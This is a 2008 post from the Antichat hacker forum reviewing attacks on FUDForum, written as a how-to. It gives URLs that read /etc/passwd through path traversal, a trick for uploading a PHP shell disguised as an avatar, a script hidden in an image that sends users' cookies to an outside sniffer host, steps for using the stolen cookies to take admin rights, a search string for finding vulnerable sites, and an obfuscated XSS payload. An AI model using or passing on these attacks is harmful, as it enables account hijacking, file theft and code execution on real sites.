Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   [Обзор Уязвимости FUDForum] (https://forum.antichat.xyz/showthread.php?t=58383)

Solide Snake 12.01.2008 23:25

[Обзор Уязвимости FUDForum]
 
[Обзор] Уязвимости FUDForum


Офф. Сайт www.fudforum.org
Актуальная версия 2.7.7
Исходники Скачать

Уязвимость в admbrowse.php


Уязвимость в admbrowse.php позволяет просматривать произвольные файлы

Код:

admbrowse.phpdown=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]

FUD Forum 2.7.1 PHP code injection vurnelability


Возможность залить вместо аватара PHP скрипт, для этого соедините аватар с PHP файлом.

Под linux/unix

Код:

cat foo.png foo.php > upload_me.php
В win в простом Notepad.


Уязвимость в tmp_view.php


Уязвимость позволяет просматривать произвольные файлы.

Код:

/tmp_view.php?file=/etc/passwd

Кража cookie


Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим:

Код:

<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>


После вставки в сообщение будет ссылка наподобии этой:

Код:

http://forum.site.ru/index.php?t=getfile&id=2723&private=0
или так нагляднее:

Код:

http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей.

******
Далее идем сюда:

Код:

http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И получаем права аминистратора.

Для поиска:

Код:

Powered by: FUDforum 2.7.4

XSS


На некоторых версиях при отключённых картинках, подписях и т.д. есть возможность провести XSS в отправке сообщения:

Код:

[img=javascript:alert('bugs!');]Бага[/img]
В слове javascript букву t нужно заменить на код & # 116 ; без пробелов.

(c)


Время: 00:25